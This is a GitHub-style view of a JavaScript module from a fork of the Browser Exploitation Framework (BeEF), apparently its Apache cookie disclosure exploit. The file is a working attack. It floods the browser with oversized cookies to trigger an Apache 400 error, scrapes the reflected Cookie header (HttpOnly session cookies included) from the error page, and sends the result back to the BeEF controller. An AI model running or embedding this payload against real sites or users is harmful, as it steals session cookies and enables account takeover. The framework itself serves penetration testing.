Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3a486c7626ce9ffc0ec829015664458ce21d0d50
beef/modules/exploits/apache_cookie_disclosure/command.js
jcrew99 3a486c7626 Updated Copyright
2023-12-26 22:32:31 -05:00

75 lines
1.7 KiB
JavaScript
Raw Blame History

//
// Copyright (c) 2006-2024Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// BASED ON https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
beef.execute(function() {
function setCookies (good) {
var str = "";
for (var i=0; i< 819; i++) {
str += "z";
}
for (i = 0; i < 10; i++) {
if (good) { // Expire evil cookie
var cookie = "beef" + i + "=;expires=" + new Date(+new Date()-1).toUTCString() + "; path=/;";
} else { // Set evil cookie
var cookie = "beef" + i + "=" + str + "; path=/";
}
document.cookie = cookie;
}
}
function makeRequest() {
setCookies();
function parseCookies () {
var cookie_dict = {};
// React on 400 status
if (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
if (content.length) {
// Remove "Cookie:" prefix
content = content[1].replace("Cookie: ", "");
var cookies = content.replace(/beef\d=z+;?/g, '').split(/;/g);
// Add cookies to object
for (var i=0; i<cookies.length; i++) {
var s_c = cookies[i].split('=',2);
cookie_dict[s_c[0]] = s_c[1];
}
}
// Unset malicious cookies
setCookies(true);
var result = JSON.stringify(cookie_dict);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "cookies="+result);
}
}
// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "/", true);
xhr.send(null);
}
makeRequest();
});
Reference in New Issue View Git Blame Copy Permalink